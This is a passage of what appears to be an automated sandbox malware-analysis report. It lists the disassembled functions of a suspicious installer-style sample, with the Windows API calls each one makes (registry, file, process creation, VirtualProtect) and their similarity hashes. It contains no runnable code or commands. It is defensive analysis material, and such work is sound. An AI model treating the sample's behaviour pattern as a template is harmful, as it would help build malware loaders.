                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 96c7ec262ab61fe6fea47152b5241fdb13327e4bfef36903235a76d16f55e530
                                        • Instruction ID: f779a6514c6a4e708396d8c5aab00734bb1243d63453d3b06c62658839fa2b1d
                                        • Opcode Fuzzy Hash: 96c7ec262ab61fe6fea47152b5241fdb13327e4bfef36903235a76d16f55e530
                                        • Instruction Fuzzy Hash: 20D0C9725056206BC2103B28EE0889BBB55DB542717028B35F9A9A22B0CB304C668B98
                                        Function 004058F1 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateDirectoryA.KERNELBASE(?,00000000,004033CB,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004058F7
                                        • GetLastError.KERNEL32(?,00000008,0000000A,0000000C), ref: 00405905
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: CreateDirectoryErrorLast
                                        • String ID:
                                        • API String ID: 1375471231-0
                                        • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                        • Instruction ID: 226d66ac6a6a747d722d053d5b09978fff7ae735be90135577c6d3bd4ef0b281
                                        • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                        • Instruction Fuzzy Hash: F9C04CB120490ADED6505B319F0971B7A51AB50751F175839A586E40A0DB348455DD2E
                                        Function 6E332AC8 Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                        Download Yara Rule
                                        APIs
                                        • EnumWindows.USER32(00000000), ref: 6E332B87
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2088083079.000000006E331000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E330000, based on PE: true
                                        • Associated: 00000000.00000002.2088011783.000000006E330000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000000.00000002.2088098769.000000006E334000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000000.00000002.2088118015.000000006E336000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e330000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: EnumWindows
                                        • String ID:
                                        • API String ID: 1129996299-0
                                        • Opcode ID: 8055c6cd7263a0502ae5bbe7c220ef61577e4dc02cbeb21349edda89ee5960d8
                                        • Instruction ID: 727c6230e5cf194a787ba7db330fe4506d9696b7633078e536b2f0dfad5b5830
                                        • Opcode Fuzzy Hash: 8055c6cd7263a0502ae5bbe7c220ef61577e4dc02cbeb21349edda89ee5960d8
                                        • Instruction Fuzzy Hash: CA413A729046A4AFDB309FA4DA81F9937BCEB05359F308865E54587210CB3A9581CFE1
                                        Function 0040269A Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: wsprintf
                                        • String ID:
                                        • API String ID: 2111968516-0
                                        • Opcode ID: 27d70afe983ce046a9cdbd576e9bb3ab08da78768c3b3dac89c271fd87d57e25
                                        • Instruction ID: c5fbe62f9b4e2cb89eed07bb10574c4b4a04671343a68c93ee4f329e73b59f15
                                        • Opcode Fuzzy Hash: 27d70afe983ce046a9cdbd576e9bb3ab08da78768c3b3dac89c271fd87d57e25
                                        • Instruction Fuzzy Hash: 3521B530D04289EEDF318B6886586EEBBB09F01314F14407FE4D1B72E2C6BC8985CB69
                                        Function 00402758 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402776
                                          • Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: FilePointerwsprintf
                                        • String ID:
                                        • API String ID: 327478801-0
                                        • Opcode ID: d0d9330acd65b2e867353bc74e86739eab35bf528f3ad37c96d6fee4195676f1
                                        • Instruction ID: 00adb5ebf99275c5c47ff66d1c826bee854e75ad94e87541b3f98b02de3c6d9f
                                        • Opcode Fuzzy Hash: d0d9330acd65b2e867353bc74e86739eab35bf528f3ad37c96d6fee4195676f1
                                        • Instruction Fuzzy Hash: E3E09272A04104AFDF50FBA4AE49DAF76B8EB40359B10043FF202F00C2CA7C4A538A2D
                                        Function 004023C9 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                        Download Yara Rule
                                        APIs
                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402402
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: PrivateProfileStringWrite
                                        • String ID:
                                        • API String ID: 390214022-0
                                        • Opcode ID: 3326b8378841c5f3540bed9b182ec42c057636b7d1278427695ffb5e145c9da6
                                        • Instruction ID: f24de8215b53ecbcf80a61348f6bfc7870897c54b3e6c90e9d08f7162164e460
                                        • Opcode Fuzzy Hash: 3326b8378841c5f3540bed9b182ec42c057636b7d1278427695ffb5e145c9da6
                                        • Instruction Fuzzy Hash: 9DE04F3160413A6BEB6036B11F8D97F2159AB84314B14053EBA11B62C6D9FC8E8352A9
                                        Function 00406141 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402D0F,00000000,?,?), ref: 0040616A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                        • Instruction ID: bbdc12591f07ec5b960d4a172b59ed2570ed34ba37628b65f55bcc9503456b15
                                        • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                        • Instruction Fuzzy Hash: 7AE0E6B2020109BEEF099F60DC1AD7B772DE708310F01492EFA06D4151E6B5E9705634
                                        Function 00405EC7 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403343,00000000,0041D440,000000FF,0041D440,000000FF,000000FF,00000004,00000000), ref: 00405EDB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        • Opcode ID: 11d7c7005d0d3054af3b9be2f3a82004ed33d4240877e49ff836af06555e7eff
                                        • Instruction ID: 0d77a24040528495e1d5683a333844bda4a24a81b27895c3293bddb668a77566
                                        • Opcode Fuzzy Hash: 11d7c7005d0d3054af3b9be2f3a82004ed33d4240877e49ff836af06555e7eff
                                        • Instruction Fuzzy Hash: 20E0EC3221065EABDF509F55DC00EEB7B6CEB05360F004837F965E2150D631EA219BE9
                                        Function 00405E98 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040338D,00000000,00000000,004031B7,000000FF,00000004,00000000,00000000,00000000), ref: 00405EAC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 62c77d97b5b576e4a72063145ecbe95ee4dab9ee0079c0f8f42f41321a19b9da
                                        • Instruction ID: c4f2c5db2c8838af9825f3b875f3a0ad88d5b51994199861a780369f0be58439
                                        • Opcode Fuzzy Hash: 62c77d97b5b576e4a72063145ecbe95ee4dab9ee0079c0f8f42f41321a19b9da
                                        • Instruction Fuzzy Hash: E4E04F32210619ABDF109F60DC04EAB3B6CEB00351F000432F954E2140D230E9118AE4
                                        Function 6E3329B1 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualProtect.KERNELBASE(6E33504C,00000004,00000040,6E33503C), ref: 6E3329CF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2088083079.000000006E331000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E330000, based on PE: true
                                        • Associated: 00000000.00000002.2088011783.000000006E330000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000000.00000002.2088098769.000000006E334000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000000.00000002.2088118015.000000006E336000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e330000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: 03985acc724b93e27526cd515bcfc72a6696ce7190b12ed8e89bf22c77568e79
                                        • Instruction ID: 18e734b0aa2cc48c338ef6943dcd83713d8b582fdb59bcd80c540cece29c91a3
                                        • Opcode Fuzzy Hash: 03985acc724b93e27526cd515bcfc72a6696ce7190b12ed8e89bf22c77568e79
                                        • Instruction Fuzzy Hash: 40F0A5F0614AC0FECB70CF688584F093BE8BB1A356F3049EAE148DA241E3364084CF91
                                        Function 00406113 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,0042DFC0,?,?,?,004061A1,?,?,?,?,00000000,?), ref: 00406137
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Open
                                        • String ID:
                                        • API String ID: 71445658-0
                                        • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                        • Instruction ID: 4278cf0171cf0b678593f71500b3925c4415a8e9ce87015ff7d519d2eb21bae6
                                        • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                        • Instruction Fuzzy Hash: BCD0123204020DBBDF119E90AD01FAB3B1DEB48350F014826FE07A8091D775D570A724
                                        Function 00404379 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageA.USER32(?,00000000,00000000,00000000), ref: 0040438B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: a0eb0ef1ff6dd579934d65901b95a1f3a9c939147581cb3b9152e9d48dc718fa
                                        • Instruction ID: f513ac05e70e3adf76b651c0ca8ec4e95b66ff2fdc1b64d79a05bcbbe3c40a95
                                        • Opcode Fuzzy Hash: a0eb0ef1ff6dd579934d65901b95a1f3a9c939147581cb3b9152e9d48dc718fa
                                        • Instruction Fuzzy Hash: 4DC09BB17403027BFE209B529E45F077798D790700F1554397754F54D0C774D410D62C
                                        Function 00404362 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageA.USER32(00000028,?,00000001,00404192), ref: 00404370
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: f6c8117e81de0903b802e48e7999fd2a70a6c35278de0d39013be8dd7138c214
                                        • Instruction ID: 50a7fc5ec129452a525cde7c4fd9a9aa290cced010421ab9f43a5acdc6dad314
                                        • Opcode Fuzzy Hash: f6c8117e81de0903b802e48e7999fd2a70a6c35278de0d39013be8dd7138c214
                                        • Instruction Fuzzy Hash: 33B0127A781601BBDE615B40DF09F457EB2E768701F408039B348240F0CEB200A9DB2C
                                        Function 00403390 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004030F6,?,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 0040339E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: bee48198ef0a4de3628cda0e050061df99a752697c0ad5ddba35b49727997b0c
                                        • Instruction ID: 699dda5fb03a211c19396a68767747e6c986426da1756d7c47186a7ffa8d2f84
                                        • Opcode Fuzzy Hash: bee48198ef0a4de3628cda0e050061df99a752697c0ad5ddba35b49727997b0c
                                        • Instruction Fuzzy Hash: EBB01231140300BFDA214F00DF09F057B21AB94710F10C034B384780F086711075EB0E
                                        Function 0040434F Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                        Download Yara Rule
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,0040412B), ref: 00404359
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: b7efc8905e9f2a5b3d5d2c2477723ee0501502072c4fff85560e1a7fdf79de64
                                        • Instruction ID: b84ed7fd3cc5f3c3e9fcd53eb4babc11f88d3e7fa425116ebe2a9639eb74f9e6
                                        • Opcode Fuzzy Hash: b7efc8905e9f2a5b3d5d2c2477723ee0501502072c4fff85560e1a7fdf79de64
                                        • Instruction Fuzzy Hash: 28A00176505500AFCA12AB50EF1980ABB66ABA4741B818479A685601358B768831EB1B
                                        Function 00401FA0 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004053D1: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00424440,74DF23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                          • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00424440,74DF23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                          • Part of subcall function 004053D1: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,004032C3,004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00424440,74DF23A0), ref: 0040542D
                                          • Part of subcall function 004053D1: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll), ref: 0040543F
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                          • Part of subcall function 00405926: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042BC90,00431800,00431800,00431800,?,888,00000000), ref: 0040594F
                                          • Part of subcall function 00405926: CloseHandle.KERNEL32(?), ref: 0040595C
                                        • CloseHandle.KERNELBASE(?,?,?,?,?,?), ref: 00401FE5
                                          • Part of subcall function 0040672A: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040673B
                                          • Part of subcall function 0040672A: GetExitCodeProcess.KERNEL32(?,?), ref: 0040675D
                                          • Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                        • String ID:
                                        • API String ID: 2972824698-0
                                        • Opcode ID: 454ea4004c7b636409d34e166e2968104a6dcee143e6bdf8ca8e7598c6747e23
                                        • Instruction ID: 2907458289dc89520fdc1db2e5a40f60bb15031deda838765eaf0f6b46983df9
                                        • Opcode Fuzzy Hash: 454ea4004c7b636409d34e166e2968104a6dcee143e6bdf8ca8e7598c6747e23
                                        • Instruction Fuzzy Hash: 0EF05B31905112DBCF20ABA55D849EF71E4DB0135CB11413FF501F21D2D7BC4A46DAAE
                                        Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
